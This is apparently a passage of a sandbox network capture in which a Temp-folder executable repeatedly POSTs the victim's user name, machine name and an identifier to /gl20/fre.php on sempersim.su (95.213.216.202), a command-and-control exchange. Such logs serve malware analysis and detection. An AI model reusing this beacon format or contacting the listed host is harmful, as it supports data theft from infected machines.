Nov 24, 2022 19:54:18.306893110 CET	13	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:54:20.029122114 CET	13	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:54:21 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.6	49731	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:55:19.158566952 CET	310	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:55:19.215342999 CET	310	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:55:20.867898941 CET	311	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:55:22 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.6	49732	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:55:21.169470072 CET	312	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:55:21.236840963 CET	312	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:55:22.836179018 CET	312	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:55:24 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.6	49733	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:55:23.201569080 CET	313	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:55:23.265949965 CET	313	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:55:24.906100035 CET	314	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:55:26 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.6	49734	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:55:25.189583063 CET	314	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:55:25.253937960 CET	315	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:55:26.886960983 CET	315	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:55:28 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.6	49735	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:55:27.170416117 CET	316	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:55:27.234226942 CET	316	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:55:28.867255926 CET	317	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:55:30 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.6	49736	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:55:29.163583994 CET	317	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:55:29.231827974 CET	318	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:55:30.902353048 CET	318	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:55:32 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.6	49737	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:55:31.199873924 CET	319	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:55:31.262911081 CET	319	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:55:32.908190966 CET	319	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:55:34 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.6	49738	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:55:33.192742109 CET	320	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:55:33.252402067 CET	320	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:55:34.897313118 CET	321	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:55:36 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.2.6	49739	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:55:35.259289980 CET	322	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:55:35.319905043 CET	322	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:55:36.924860954 CET	322	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:55:38 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.2.6	49740	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:55:37.776320934 CET	323	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:55:37.840137959 CET	323	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:55:39.709470034 CET	324	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:55:41 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.6	49701	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:54:22.087876081 CET	14	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:54:22.151093006 CET	14	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:54:23.783922911 CET	15	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:54:25 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	192.168.2.6	49741	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:55:39.990050077 CET	324	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:55:40.046775103 CET	325	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:55:40.700457096 CET	325	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:55:43 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
41	192.168.2.6	49742	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:55:40.973541975 CET	326	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:55:41.034637928 CET	326	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:55:42.590814114 CET	326	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:55:44 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
42	192.168.2.6	49743	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:55:42.875605106 CET	327	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:55:42.938832045 CET	327	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:55:44.744519949 CET	328	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:55:46 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	192.168.2.6	49744	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:55:45.028739929 CET	329	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:55:45.092725039 CET	329	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:55:46.796463013 CET	329	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:55:48 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	192.168.2.6	49745	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:55:47.082757950 CET	330	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:55:47.150202990 CET	330	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:55:48.824553967 CET	331	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:55:50 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	192.168.2.6	49746	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:55:49.078874111 CET	331	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:55:49.145370960 CET	332	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:55:50.859980106 CET	332	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:55:52 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
46	192.168.2.6	49747	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:55:51.131717920 CET	333	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:55:51.196275949 CET	333	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:55:52.860690117 CET	334	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:55:54 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
47	192.168.2.6	49748	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:55:53.130311012 CET	335	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:55:53.190058947 CET	335	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:55:54.888387918 CET	335	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:55:56 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
48	192.168.2.6	49749	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:55:55.139214993 CET	336	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:55:55.195702076 CET	336	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:55:57.050677061 CET	337	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:55:58 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
